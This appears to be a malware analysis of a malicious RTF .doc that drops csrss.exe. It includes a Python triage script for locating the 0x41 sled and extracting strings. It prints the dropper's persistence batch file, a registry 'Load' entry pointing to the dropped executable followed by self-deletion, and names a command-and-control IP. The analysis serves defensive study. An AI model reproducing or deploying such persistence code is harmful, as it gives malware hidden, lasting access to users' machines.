The .doc file contains Rich Text Format (RTF) encoded content, and we can see a long 0x41 sled until we reach the actual shellcode embedded within the sled bytes. Below is the location of the exploit code in hex format:
After converting the hex to binary, some interesting strings appear. I'm not sure why it tries to execute a ping command to localhost. After the malicious .doc file is executed, it creates a file named csrss.exe (921C724CCB04B9F672B294FFFF83CE7B) and executes it, then renames it to 'winword.exe'. It then launches cmd.exe to ping 127.0.0.1 with 1 byte. After that, the malware opens a clean Word .doc file.
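As an added triage example (my own code, not the author's tooling), the following Python decodes the hex-encoded data runs of an RTF document, locates the 0x41 sled, and pulls readable strings from the bytes after it. The RTF sample embedded in it is constructed for the demonstration, not taken from the analysed .doc.

```python
import re

# Binary data in RTF (e.g. inside \objdata) is hex-encoded ASCII, so look for
# long runs of hex digits in the raw document text.
HEX_RUN = re.compile(rb"[0-9A-Fa-f]{16,}")
PRINTABLE = re.compile(rb"[\x20-\x7e]{6,}")


def extract_hex_blobs(rtf: bytes) -> list[bytes]:
    """Decode every long hex run in an RTF document into raw bytes."""
    blobs = []
    for m in HEX_RUN.finditer(rtf):
        run = m.group(0)
        if len(run) % 2:          # odd-length run: drop the dangling nibble
            run = run[:-1]
        blobs.append(bytes.fromhex(run.decode("ascii")))
    return blobs


def find_sled(data: bytes, byte: int = 0x41, min_len: int = 32):
    """Return (start, end) of the first run of `byte` at least min_len long, else None."""
    pat = re.compile(re.escape(bytes([byte])) + b"{%d,}" % min_len)
    m = pat.search(data)
    return (m.start(), m.end()) if m else None


def strings_after_sled(data: bytes) -> list[bytes]:
    """Printable strings that follow the sled, i.e. inside the payload itself."""
    sled = find_sled(data)
    if sled is None:
        return []
    return [s.group(0) for s in PRINTABLE.finditer(data[sled[1]:])]


def triage(rtf: bytes) -> dict:
    """Summarise sled position and post-sled strings for the first blob that has a sled."""
    for blob in extract_hex_blobs(rtf):
        sled = find_sled(blob)
        if sled:
            return {"sled": sled, "strings": strings_after_sled(blob)}
    return {}


# Constructed sample: a minimal RTF wrapper around a 64-byte 0x41 sled followed
# by a fake payload carrying strings like those seen in the real sample.
_payload = b"\xeb\x10" + b"cmd.exe /c ping 127.0.0.1\x00" + b"winword.exe\x00"
SAMPLE_RTF = b"{\\rtf1{\\object\\objdata " + (b"\x41" * 64 + _payload).hex().encode() + b"}}"

if __name__ == "__main__":
    print(triage(SAMPLE_RTF))
```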
The running csrss.exe creates Update.bat in the user's Start Menu Startup folder with the following content:
Echo off
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "C:\DOCUME~1\User\LOCALS~1\Temp\csrss.exe" /f
del %%0
The batch file adds a startup entry to the user's Windows registry pointing to csrss.exe in the user's temporary folder. Next, let's take a look at the packet capture:
The captured packets show that the malicious file attempts a POST request to the following URL:
IP Address: 22.214.171.124
The IP address is located in China and was still active at the time of writing. csrss.exe stays resident in memory, sleeps for 60 seconds, and then checks back to the given URL.